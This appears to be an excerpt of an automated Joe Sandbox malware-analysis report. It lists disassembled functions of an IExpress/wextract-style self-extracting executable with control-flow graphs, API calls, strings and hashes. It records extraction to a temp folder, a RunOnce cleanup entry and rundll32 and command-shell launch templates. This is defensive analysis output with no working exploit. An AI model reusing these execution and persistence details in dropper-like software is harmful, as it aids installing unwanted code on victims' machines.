                                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$valid
                                                                                                                                                                                                                                                            • API String ID: 1032054927-568848881
                                                                                                                                                                                                                                                            • Opcode ID: 035686a1f7776a6915f190761646c46ba3f9e505c05e35c1ccd7f91077665b64
                                                                                                                                                                                                                                                            • Instruction ID: b4587479dae612a4b70111539f111fbae3e8f99942849f4b35893005e6faeca5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 035686a1f7776a6915f190761646c46ba3f9e505c05e35c1ccd7f91077665b64
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99B1F370A08B319FD7309F24B945BAA76E7EB85740F00092EFA85D6390DB78CA45CF56
                                                                                                                                                                                                                                                            Function 00621AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 141 621ae8-621b2c call 621680 144 621b3b-621b40 141->144 145 621b2e-621b39 141->145 146 621b46-621b61 call 621a84 144->146 145->146 149 621b63-621b65 146->149 150 621b9f-621bc2 call 621781 call 62658a 146->150 152 621b68-621b6d 149->152 159 621bc7-621bd3 call 6266c8 150->159 152->152 154 621b6f-621b74 152->154 154->150 155 621b76-621b7b 154->155 157 621b83-621b86 155->157 158 621b7d-621b81 155->158 157->150 161 621b88-621b8a 157->161 158->157 160 621b8c-621b9d call 621680 158->160 166 621d73-621d7f call 6266c8 159->166 167 621bd9-621bf1 CompareStringA 159->167 160->159 161->150 161->160 174 621d81-621d99 CompareStringA 166->174 175 621df8-621e09 LocalAlloc 166->175 167->166 169 621bf7-621c07 GetFileAttributesA 167->169 170 621d53-621d5e 169->170 171 621c0d-621c15 169->171 176 621d64-621d6e call 6244b9 170->176 171->170 173 621c1b-621c33 call 621a84 171->173 187 621c50-621c61 LocalAlloc 173->187 188 621c35-621c38 173->188 174->175 178 621d9b-621da2 174->178 179 621dd4-621ddf 175->179 180 621e0b-621e1b GetFileAttributesA 175->180 192 621e94-621ea4 call 626ce0 176->192 183 621da5-621daa 178->183 179->176 184 621e67-621e73 call 621680 180->184 185 621e1d-621e1f 180->185 183->183 189 621dac-621db4 183->189 198 621e78-621e84 call 622aac 184->198 185->184 191 621e21-621e3e call 621781 185->191 187->179 197 621c67-621c72 187->197 194 621c40-621c4b call 621a84 188->194 195 621c3a 188->195 196 621db7-621dbc 189->196 191->198 207 621e40-621e43 191->207 194->187 195->194 196->196 202 621dbe-621dd2 LocalAlloc 196->202 203 621c74 197->203 204 621c79-621cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->204 211 621e89-621e92 198->211 202->179 208 621de1-621df3 call 62171e 202->208 203->204 209 621cc2-621ccc 204->209 210 621cf8-621d07 204->210 207->198 212 621e45-621e65 call 6216b3 * 2 207->212 208->211 216 621cd3-621cf3 call 621680 * 2 209->216 217 621cce 209->217 213 621d23 210->213 214 621d09-621d21 GetShortPathNameA 210->214 211->192 212->198 219 621d28-621d2b 213->219 214->219 216->211 217->216 224 621d32-621d4e call 62171e 219->224 225 621d2d 219->225 224->211 225->224
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00621BE7
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00621BFE
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00621C57
                                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32(?,Reboot,00000000,?), ref: 00621C88
                                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00621140,00000000,00000008,?), ref: 00621CB8
                                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00621D1B
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                            • API String ID: 383838535-819679500
                                                                                                                                                                                                                                                            • Opcode ID: c63178d877d37aac691ff28d356e3e442e64b242c4b9e470fa143e69c6b69054
                                                                                                                                                                                                                                                            • Instruction ID: bcee8cccb5748b4509c118ab1b9cd07de8b64b462a8f570a4b4900d77a34480b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c63178d877d37aac691ff28d356e3e442e64b242c4b9e470fa143e69c6b69054
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5A16B70A08E385BDB209B24EC49BEA376B9F73310F104699E455AF3C0DBB08D868F54
                                                                                                                                                                                                                                                            Function 00622F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 466 622f1d-622f3d 467 622f3f-622f46 466->467 468 622f6c-622f73 call 625164 466->468 470 622f48 call 6251e5 467->470 471 622f5f call 623a3f 467->471 476 623041 468->476 477 622f79-622f80 call 6255a0 468->477 478 622f4d-622f4f 470->478 475 622f64-622f66 471->475 475->468 475->476 481 623043-623053 call 626ce0 476->481 477->476 485 622f86-622fbe GetSystemDirectoryA call 62658a LoadLibraryA 477->485 478->476 479 622f55-622f5d 478->479 479->468 479->471 488 622fc0-622fd4 GetProcAddress 485->488 489 622ff7-623004 FreeLibrary 485->489 488->489 492 622fd6-622fee DecryptFileA 488->492 490 623006-62300c 489->490 491 623017-623024 SetCurrentDirectoryA 489->491 490->491 493 62300e call 62621e 490->493 494 623026-62303c call 6244b9 call 626285 491->494 495 623054-62305a 491->495 492->489 501 622ff0-622ff5 492->501 505 623013-623015 493->505 494->476 497 623065-62306c 495->497 498 62305c call 623b26 495->498 503 62306e-623075 call 62256d 497->503 504 62307c-623089 497->504 507 623061-623063 498->507 501->489 514 62307a 503->514 509 6230a1-6230a9 504->509 510 62308b-623091 504->510 505->476 505->491 507->476 507->497 512 6230b4-6230b7 509->512 513 6230ab-6230ad 509->513 510->509 515 623093 call 623ba2 510->515 512->481 513->512 517 6230af call 624169 513->517 514->504 520 623098-62309a 515->520 517->512 520->476 521 62309c 520->521 521->509
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00622F93
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00622FB2
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00622FC6
                                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00622FE6
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00622FF8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0062301C
                                                                                                                                                                                                                                                              • Part of subcall function 006251E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00622F4D,?,00000002,00000000), ref: 00625201
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                            • API String ID: 2126469477-3023407756
                                                                                                                                                                                                                                                            • Opcode ID: bb7704034492d9908356145c67a5398f2a2f75256c75ed90044bec21aa0b8378
                                                                                                                                                                                                                                                            • Instruction ID: 4fe3e332c767f5c66ae69c5602d8aef0ceefeae3bb3c593cfade9df214737ad4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bb7704034492d9908356145c67a5398f2a2f75256c75ed90044bec21aa0b8378
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0641E730A01E369BDB30AB71BD4A6E633AB9B54754F001029A941D2791EF78CE82CE75
                                                                                                                                                                                                                                                            Function 00622390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00628A3A,006211F4,00628A3A,00000000,?,?), ref: 006223F6
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,006211F8), ref: 00622427
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,006211FC), ref: 0062243B
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00622495
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 006224A3
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 006224AF
                                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 006224BE
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00628A3A), ref: 006224C5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                                            • Opcode ID: 422fd2274ee20efdc22f3285eebe9edfbe9fea929b5f0244b0482ed7d36106dd
                                                                                                                                                                                                                                                            • Instruction ID: 1441b7d1ade341e40351ae26aa559a074847b86e3b2e0f6f63566673d3f3252d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 422fd2274ee20efdc22f3285eebe9edfbe9fea929b5f0244b0482ed7d36106dd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4631D031208F51ABC330EFA4EC8DAEB73EEABC5305F04492DB55586290EB74990DCB52
                                                                                                                                                                                                                                                            Function 00622BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00626BB0,00620000,00000000,00000002,0000000A), ref: 00622C03
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00626BB0,00620000,00000000,00000002,0000000A), ref: 00622C18
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00622C28
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00626BB0,00620000,00000000,00000002,0000000A), ref: 00622C98
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                            • Opcode ID: f64a1a926b0e2d587431ddfcf410a5670a9aeff27edcc4cdaec118d77e780acf
                                                                                                                                                                                                                                                            • Instruction ID: 9385bdacf225d53e61abb3dc4a15fc160894380f2e0c8d3f739eaf298e485e81
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f64a1a926b0e2d587431ddfcf410a5670a9aeff27edcc4cdaec118d77e780acf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32110271701F27BBC7B06BB5BDA9BAE375B9B843A4B041019F805E3350CA30DC528E66
                                                                                                                                                                                                                                                            Function 0062202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00622050
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0062205F
                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0062208C
                                                                                                                                                                                                                                                              • Part of subcall function 0062171E: _vsnprintf.MSVCRT ref: 00621750
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?), ref: 006220C9
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 006220EA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00622103
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?), ref: 00622122
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00622134
                                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?), ref: 00622144
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0062215B
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?), ref: 0062218C
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 006221C1
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 006221E4
                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0062223D
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00622249
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00622250
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                                                                            • API String ID: 178549006-217856272
                                                                                                                                                                                                                                                            • Opcode ID: ed71f511531b6d1d7d1c71007ca1bb99d54037c487881835cfd56b31f61cc5ec
                                                                                                                                                                                                                                                            • Instruction ID: 067180b44dd5563fef3ba1997f85a1fdd9e1eddf9556ec83cac8238a4aa01db9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed71f511531b6d1d7d1c71007ca1bb99d54037c487881835cfd56b31f61cc5ec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6510471A01A25BFDB309F60EC5DFEA772BEB55700F0041A8BA45A7150DAB19E468E60
                                                                                                                                                                                                                                                            Function 006255A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 232 6255a0-6255d9 call 62468f LocalAlloc 235 6255db-6255f1 call 6244b9 call 626285 232->235 236 6255fd-62560c call 62468f 232->236 248 6255f6-6255f8 235->248 242 625632-625643 lstrcmpA 236->242 243 62560e-625630 call 6244b9 LocalFree 236->243 246 625645 242->246 247 62564b-625659 LocalFree 242->247 243->248 246->247 250 625696-62569c 247->250 251 62565b-62565d 247->251 254 6258b7-6258c7 call 626ce0 248->254 255 6256a2-6256a8 250->255 256 62589f-6258b5 call 626517 250->256 252 625669 251->252 253 62565f-625667 251->253 257 62566b-62567a call 625467 252->257 253->252 253->257 255->256 260 6256ae-6256c1 GetTempPathA 255->260 256->254 269 625680-625691 call 6244b9 257->269 270 62589b-62589d 257->270 264 6256f3-625711 call 621781 260->264 265 6256c3-6256c9 call 625467 260->265 274 625717-625729 GetDriveTypeA 264->274 275 62586c-625890 GetWindowsDirectoryA call 62597d 264->275 272 6256ce-6256d0 265->272 269->248 270->254 272->270 276 6256d6-6256df call 622630 272->276 278 625730-625740 GetFileAttributesA 274->278 279 62572b-62572e 274->279 275->264 286 625896 275->286 276->264 287 6256e1-6256ed call 625467 276->287 284 625742-625745 278->284 285 62577e-62578f call 62597d 278->285 279->278 279->284 289 625747-62574f 284->289 290 62576b 284->290 297 6257b2-6257bf call 622630 285->297 298 625791-62579e call 622630 285->298 286->270 287->264 287->270 292 625771-625779 289->292 294 625751-625753 289->294 290->292 296 625864-625866 292->296 294->292 299 625755-625762 call 626952 294->299 296->274 296->275 308 6257d3-6257f8 call 62658a GetFileAttributesA 297->308 309 6257c1-6257cd GetWindowsDirectoryA 297->309 298->290 307 6257a0-6257b0 call 62597d 298->307 299->290 306 625764-625769 299->306 306->285 306->290 307->290 307->297 314 62580a 308->314 315 6257fa-625808 CreateDirectoryA 308->315 309->308 316 62580d-62580f 314->316 315->316 317 625811-625825 316->317 318 625827-62585c SetFileAttributesA call 621781 call 625467 316->318 317->296 318->270 323 62585e 318->323 323->296
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246A0
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: SizeofResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246A9
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 006246C3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LoadResource.KERNEL32(00000000,00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246CC
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: LockResource.KERNEL32(00000000,?,00622D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 006246D3
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: memcpy_s.MSVCRT ref: 006246E5
                                                                                                                                                                                                                                                              • Part of subcall function 0062468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 006246EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 006255CF
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00625638
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0062564C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00625620
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00624518
                                                                                                                                                                                                                                                              • Part of subcall function 006244B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00624554
                                                                                                                                                                                                                                                              • Part of subcall function 00626285: GetLastError.KERNEL32(00625BBC), ref: 00626285
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 006256B9
                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0062571E
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00625737
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 006257CD
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 006257EF
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00625802
                                                                                                                                                                                                                                                              • Part of subcall function 00622630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00622654
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00625830
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: FindResourceA.KERNEL32(00620000,000007D6,00000005), ref: 0062652A
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: LoadResource.KERNEL32(00620000,00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00626538
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: DialogBoxIndirectParamA.USER32(00620000,00000000,00000547,006219E0,00000000), ref: 00626557
                                                                                                                                                                                                                                                              • Part of subcall function 00626517: FreeResource.KERNEL32(00000000,?,?,00622EE8,00000000,006219E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00626560
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00625878
                                                                                                                                                                                                                                                              • Part of subcall function 0062597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 006259A8
                                                                                                                                                                                                                                                              • Part of subcall function 0062597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 006259AF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2514851973.0000000000621000.00000020.00000001.01000000.00000004.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514767853.0000000000620000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514927872.0000000000628000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2514972067.000000000062C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_620000_i9z22.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                            • API String ID: 2436801531-1384155332
                                                                                                                                                                                                                                                            • Opcode ID: 3e66c70078abdb260243b18f72e47d0872200d189aa7ced7d368e7e98457fe8a
                                                                                                                                                                                                                                                            • Instruction ID: adf4b6c95084611f197e407dc9dff8c57bdd72ce4650f0266b84db123d693161
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e66c70078abdb260243b18f72e47d0872200d189aa7ced7d368e7e98457fe8a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 79814C70A04E359BDB70AB74BC45BEE766F9B61340F040069F987D6291DFB48EC28E54
                                                                                                                                                                                                                                                            Function 00622CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
